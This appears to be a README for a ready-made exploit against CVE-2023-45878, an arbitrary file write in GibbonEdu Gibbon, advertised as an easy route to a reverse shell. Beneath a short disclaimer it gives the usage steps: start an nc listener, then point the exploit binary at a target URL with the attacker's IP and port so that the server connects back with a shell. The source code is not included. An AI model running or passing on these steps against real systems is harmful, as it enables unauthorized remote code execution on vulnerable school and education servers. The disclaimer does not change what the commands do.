
CVE-2023-45878 easy exploit | revers sehell
GibbonEdu Gibbon version 25.0.1 and before allows Arbitrary File Write
https://nvd.nist.gov/vuln/detail/CVE-2023-45878
https://herolab.usd.de/security-advisories/usd-2023-0025/
This exploit is provided for educational and research purposes only. Unauthorized use of this code against systems without explicit permission is illegal and may violate cybercrime laws in various jurisdictions. I assume no responsibility for any misuse or damage caused by this exploit.
It is the user’s responsibility to ensure compliance with all applicable laws and ethical guidelines before executing this code. Do not use this exploit for malicious activities.
This exploit works exclusively on Windows Server. If the vulnerable version of Gibbon runs on a Linux server, you will need to modify the exploit accordingly.
nc -lnvp <PORT>go run gibbon-rce-exploit -url http://vulnerable.com -ip <IP> -p <PORT> or ./gibbon-rce-exploit -url http://vulnerable.com -ip <IP> -p <PORT>